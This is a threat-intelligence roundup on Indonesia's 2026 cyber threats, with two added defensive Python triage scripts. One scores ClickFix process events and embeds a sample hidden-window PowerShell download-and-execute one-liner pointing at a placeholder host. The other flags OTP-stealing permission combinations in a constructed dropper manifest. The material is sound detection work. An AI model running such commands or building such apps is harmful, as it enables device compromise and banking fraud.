source: https://www.hendryadrian.com/dashboard/#explorer
Keypoints
- Indonesia in 2026 faces a multi-vector threat landscape spanning financial fraud, mobile malware, espionage, and ransomware across government, banking, telecom, and critical infrastructure.
- SURXRAT V5 Android RAT demonstrates malware-as-a-service capabilities, intercepting OTPs and enabling financial fraud with AI-assisted evasion.
- ClickFix campaigns distribute the MIMICRAT RAT via compromised sites and Indonesian-language lures to bypass security, steal tokens, and maintain persistence.
- Coretax phishing campaigns impersonate tax officers via WhatsApp, distributing malicious APKs and intercepting OTPs to achieve remote banking takeovers.
- Ransomware escalation (The Gentlemen's double-extortion RaaS), state-sponsored espionage (Lotus Blossom, Fancy Bear, Amaranth-Dragon, and the TGR-STA-1030/UNC6619 "Shadow Campaigns"), and the record-setting AISURU/Kimwolf DDoS botnet threaten national security and critical services.
Indonesia faces an increasingly complex cyber threat landscape in 2026, ranging from large-scale financial fraud and mobile malware to state-sponsored espionage and ransomware. As digital adoption accelerates across government, banking, telecom, and critical infrastructure sectors, threat actors are intensifying operations that target both institutions and ordinary citizens.
Cyber Scam Threats Facing Indonesia
Indonesia is heavily impacted by large-scale scam-ad, phishing, and malware campaigns of the kind Meta is now pursuing through litigation. These operations involve celebrity-bait fraud, "pig butchering" investment schemes, DNS hijacking via compromised routers, and malicious push notifications. Indonesian users are lured through social media platforms, their financial data is harvested, and malware is distributed at scale.
Feb 27 (2026) – https://thehackernews.com/2026/02/meta-files-lawsuits-against-brazil.html
Emerging Android RAT Threats in Indonesia
The malware-as-a-service Android RAT SURXRAT V5, derived from ArsinkRAT, has been linked to Indonesian threat actors. By abusing gaming apps and Android Accessibility Services, it enables OTP interception, financial fraud, ransomware-style locking, and AI-assisted evasion. Indonesian Android users face heightened risks of account takeover, data theft, and mobile extortion.
Feb 25 (2026) – https://thecyberexpress.com/surxrat-arsinkrat-llm-android-rat-analysis/
ClickFix Malware Campaign Targeting Indonesian Users
Advanced ClickFix campaigns distribute the custom MIMICRAT remote access trojan via compromised websites and localized Indonesian-language lures. Victims are tricked into copying and running malicious PowerShell commands themselves, which lets the initial execution sidestep controls aimed at downloaded files; the attackers then steal tokens and maintain persistent access. The campaign mirrors activity previously analyzed by Elastic Security Labs.
Feb 20 (2026) – https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks
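The execution chain a ClickFix lure produces is distinctive in process telemetry: an interactive parent such as explorer.exe (the Win+R Run box) spawns a script host with a hidden window, an encoded or remotely fetched payload, and often a trailing captcha-style comment that the lure appended to the pasted text. As an added example, not code from the original page, from Elastic's report, or from any of the cited sources, the Python below scores process-creation events for that chain. The key=value event format, the hostnames, the .invalid URLs and the indicator weights are constructed assumptions; map the fields to your own EDR, Sysmon Event ID 1 or Windows 4688 telemetry.

```python
"""Triage heuristic for ClickFix-style execution chains (constructed example).

Scores process-creation events for the pattern a ClickFix lure produces: an
interactive parent (explorer.exe from the Win+R Run box, a terminal) spawning a
script host whose command line looks like a pasted one-liner.
"""
import re
from dataclasses import dataclass, field

# Parents from which a user pastes a command by hand (assumption: tune per estate)
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
# Script hosts ClickFix lures typically invoke
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# (pattern, weight, label); the weights are an assumption for this example
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "invoke-expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), 2, "remote fetch"),
    (re.compile(r"https?://", re.I), 1, "URL in command line"),
    (re.compile(r"\bget-clipboard\b", re.I), 3, "clipboard read"),
    (re.compile(r"\bmshta\s+(?:https?:|vbscript:|javascript:)", re.I), 3, "mshta inline/remote"),
    (re.compile(r"#\s*(?:I am not a robot|Ref(?:erence)?\s*ID|Verification)", re.I), 3, "captcha-style comment"),
]

# Constructed sample events in a simple key=value format; cmd is double-quoted.
SAMPLE_EVENTS = [
    'ts=2026-02-20T09:14:02Z host=WS-JKT-07 user=andi parent=explorer.exe image=powershell.exe '
    'cmd="powershell -w hidden -ep bypass -c iex (irm https://cdn.example.invalid/a) # I am not a robot - Verification ID: 7731"',
    'ts=2026-02-20T09:20:11Z host=WS-JKT-12 user=sari parent=explorer.exe image=mshta.exe '
    'cmd="mshta https://verify.example.invalid/c.hta"',
    'ts=2026-02-20T10:02:45Z host=WS-JKT-03 user=budi parent=windowsterminal.exe image=powershell.exe '
    'cmd="powershell -NoProfile -Command Get-Service -Name Spooler"',
    'ts=2026-02-20T10:30:00Z host=SRV-JKT-01 user=SYSTEM parent=svchost.exe image=powershell.exe '
    'cmd="powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"',
    'ts=2026-02-20T11:00:00Z host=SRV-JKT-02 user=SYSTEM parent=svchost.exe image=powershell.exe '
    'cmd="powershell -EncodedCommand RwBlAHQALQBQAHIAbwBjAGUAcwBzAA=="',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Verdict:
    host: str
    user: str
    image: str
    score: int
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse one key=value line; a double-quoted value may contain spaces."""
    return {k: (quoted if quoted else bare) for k, quoted, bare in KV_RE.findall(line)}


def score_event(ev: dict) -> Verdict:
    """Score a parsed event; only launches of a script host are considered."""
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    v = Verdict(ev.get("host", ""), ev.get("user", ""), image, 0)
    if image not in SCRIPT_HOSTS:
        return v
    if parent in INTERACTIVE_PARENTS:  # a human typed or pasted this command
        v.score += 2
        v.reasons.append(f"interactive parent {parent}")
    cmd = ev.get("cmd", "")
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            v.score += weight
            v.reasons.append(label)
    return v


def triage(lines, threshold: int = 5) -> list:
    """Return verdicts at or above the alert threshold, highest score first."""
    hits = [score_event(parse_event(line)) for line in lines]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"{v.host} {v.user} {v.image} score={v.score}: {', '.join(v.reasons)}")
```

The threshold is chosen so that a single weak signal does not alert: the service-parented scheduled task with an encoded command scores 3 and stays below it, while the explorer.exe-parented one-liner with a hidden window, a remote fetch and the captcha comment scores 12. Whatever weights you settle on, the parent-process condition is the part worth keeping, since legitimate automation almost never launches a script host from the Run box.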
Coretax Phishing and Mobile Banking Fraud
A nationwide phishing and mobile malware campaign abused Indonesia’s Coretax platform. Attributed to the GoldFactory group and reported by Group-IB, attackers impersonated tax officers via WhatsApp, distributed malicious APKs, intercepted OTPs, and performed remote banking takeovers, causing significant financial losses.
Feb 19 (2026) – https://www.infosecurity-magazine.com/news/fake-coretax-apps-fraud-indonesia/
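The SURXRAT family described above and the fake Coretax APKs lean on the same Android primitives that OTP-stealing banking malware typically needs: an accessibility service to read screen content and drive the UI, SMS permissions plus a high-priority SMS_RECEIVED receiver to capture one-time codes, overlay permission for phishing screens, and, for lock-screen extortion, device-admin rights. As an added example that is not from the original page or from Group-IB's or The Cyber Express's analysis, the Python below scores a decoded AndroidManifest.xml for that combination, which is a fast first-pass triage for a sideloaded APK received over WhatsApp. It assumes the manifest has already been decoded to plain XML (for instance with apktool); the two manifests, their package names and the indicator weights are constructed for illustration.

```python
"""Static triage of a decoded AndroidManifest.xml for the permission and
component combination typical of OTP-stealing banking RATs (constructed example).

Assumes the manifest has been decoded to plain XML (e.g. with apktool); the two
manifests below are constructed, not taken from any real sample.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"
A_PERM = f"{{{ANDROID_NS}}}permission"

# uses-permission -> (weight, why it matters); weights are an assumption for triage
RISKY_PERMISSIONS = {
    "android.permission.RECEIVE_SMS": (3, "can intercept incoming SMS, i.e. OTP codes"),
    "android.permission.READ_SMS": (2, "can read stored SMS"),
    "android.permission.SYSTEM_ALERT_WINDOW": (2, "can draw overlays on top of banking apps"),
    "android.permission.REQUEST_INSTALL_PACKAGES": (1, "can sideload further payloads"),
    "android.permission.RECEIVE_BOOT_COMPLETED": (1, "can restart itself after reboot"),
}
ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"
DEVICE_ADMIN_BIND = "android.permission.BIND_DEVICE_ADMIN"
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest mimicking a fake "tax update" dropper (not a real sample)
FAKE_TAX_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.taxupdate">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Coretax Update">
    <service android:name=".A11yService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999"><action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed manifest of an ordinary game, for comparison
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.puzzle">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.VIBRATE"/>
  <application android:label="Puzzle">
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
  </application>
</manifest>"""


def analyze_manifest(xml_text: str) -> dict:
    """Return package, score, findings and a verdict for one decoded manifest."""
    root = ET.fromstring(xml_text)
    score, findings = 0, []
    declared = {el.get(A_NAME) for el in root.findall("uses-permission")}
    for perm, (weight, why) in RISKY_PERMISSIONS.items():
        if perm in declared:
            score += weight
            findings.append(f"{perm.rsplit('.', 1)[-1]}: {why}")
    app = root.find("application")
    for svc in (app.iter("service") if app is not None else []):
        # An accessibility service can read every screen and inject taps: the
        # primitive behind on-device OTP theft and automated transfers.
        if svc.get(A_PERM) == ACCESSIBILITY_BIND:
            score += 4
            findings.append(f"accessibility service {svc.get(A_NAME)}")
    for rcv in (app.iter("receiver") if app is not None else []):
        actions = {a.get(A_NAME) for a in rcv.iter("action")}
        if SMS_RECEIVED in actions:
            score += 3
            findings.append(f"SMS_RECEIVED receiver {rcv.get(A_NAME)}")
        if rcv.get(A_PERM) == DEVICE_ADMIN_BIND:
            # Device-admin rights allow screen locking and wipe: the lever for
            # ransomware-style extortion on the handset.
            score += 2
            findings.append(f"device-admin receiver {rcv.get(A_NAME)}")
    verdict = "high" if score >= 7 else "medium" if score >= 4 else "low"
    return {"package": root.get("package"), "score": score, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for manifest in (FAKE_TAX_MANIFEST, BENIGN_MANIFEST):
        report = analyze_manifest(manifest)
        print(f"{report['package']}: {report['verdict']} ({report['score']})")
        for finding in report["findings"]:
            print("  -", finding)
```

The accessibility service carries the highest single weight on purpose: a tax or banking app has no legitimate reason to declare one, and on its own it is enough to push a manifest into the "medium" band. Note that a manifest check is only a first pass; a dropper can request permissions at runtime or fetch the real payload after install, so anything scoring above "low" still needs dynamic analysis.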
State-Sponsored Espionage Targeting Indonesia
Several advanced persistent threat (APT) groups have targeted Indonesia in 2026:
- Lotus Blossom conducted long-term espionage across Southeast Asia, abusing supply chains such as Notepad++ updates to infiltrate government and telecom networks.
- Fancy Bear (APT28) targeted government, defense, and energy sectors through spear-phishing and rapid exploitation of Microsoft Office vulnerabilities.
- Amaranth-Dragon weaponized the WinRAR vulnerability CVE-2025-8088 using fake civil servant salary decree files to infect Indonesian government agencies.
- Shadow Campaigns by TGR-STA-1030/UNC6619 compromised an Indonesian airline and government-linked entities using Exchange exploits, Cobalt Strike, and Linux rootkits.
Feb 04–20 (2026) –
https://socradar.io/blog/dark-web-profile-lotus-blossom/
https://www.cyfirma.com/research/apt-profile-fancy-bear-3/
https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/
https://unit42.paloaltonetworks.com/shadow-campaigns-uncovering-global-espionage/
Ransomware Escalation in Indonesia
Indonesia ranks among the most targeted countries in Asia for ransomware. Groups such as The Gentlemen operate double-extortion RaaS models, exploiting exposed VPNs and Active Directory weaknesses to encrypt Windows, Linux, and ESXi systems. Government, BFSI (banking, financial services and insurance), healthcare, telecom, and manufacturing sectors face operational shutdowns and data-leak threats.
Feb 12 (2026) – https://socradar.io/blog/dark-web-profile-the-gentlemen-ransomware/
Hyper-Volumetric DDoS and Botnet Threats
The AISURU/Kimwolf botnet has launched record-breaking 31.4 Tbps DDoS floods. Indonesia functions both as a target and as a source of infected Android devices contributing to botnet traffic. Such attacks threaten telecom providers, gaming services, and digital economy platforms with large-scale service disruption.
Feb 05 (2026) – https://thehackernews.com/2026/02/aisurukimwolf-botnet-launches-record.html
Financial Sector Data Breach Risks
The alleged sale of 3 million customer records from a major Indonesian bank highlights systemic financial-sector exposure. Leaked data—including account types, balances, and SWIFT codes—raises risks of fraud, phishing escalation, and large-scale abuse within Indonesia’s banking and fintech ecosystem.
Jan 21 (2026) – https://asec.ahnlab.com/en/92207/
Critical Infrastructure and Satellite Sector Breaches
Infostealer-driven credential theft has exposed cloud platforms used by global enterprises and Indonesia’s own PT Pasifik Satelit Nusantara. Attackers leveraged stolen credentials and weak multi-factor authentication controls to access sensitive satellite and aerospace project data, posing espionage and national security risks.
Jan 05 (2026) – https://www.infostealers.com/article/dozens-of-global-companies-hacked-via-cloud-credentials-from-infostealer-infections-more-at-risk/s
Expanding “Blast Radius” and AI Abuse
Indonesia also faces emerging risks from AI misuse, including the deepfake abuse linked to xAI's Grok that is now under investigation in California. Combined with ransomware, identity-based attacks, and supply-chain compromises, cyber incidents now have a broader "blast radius," potentially impacting public services, regulatory stability, and national economic resilience.
Jan 14 (2026) – https://therecord.media/california-grok-deepfakes-investigation
Conclusion
The cyber threat environment in Indonesia throughout 2026 demonstrates a convergence of financial cybercrime, advanced espionage, ransomware escalation, and infrastructure-focused attacks. Strengthening multi-factor authentication, mobile security, supply-chain defenses, and cross-sector coordination will be essential to reducing systemic risk across the nation’s expanding digital ecosystem.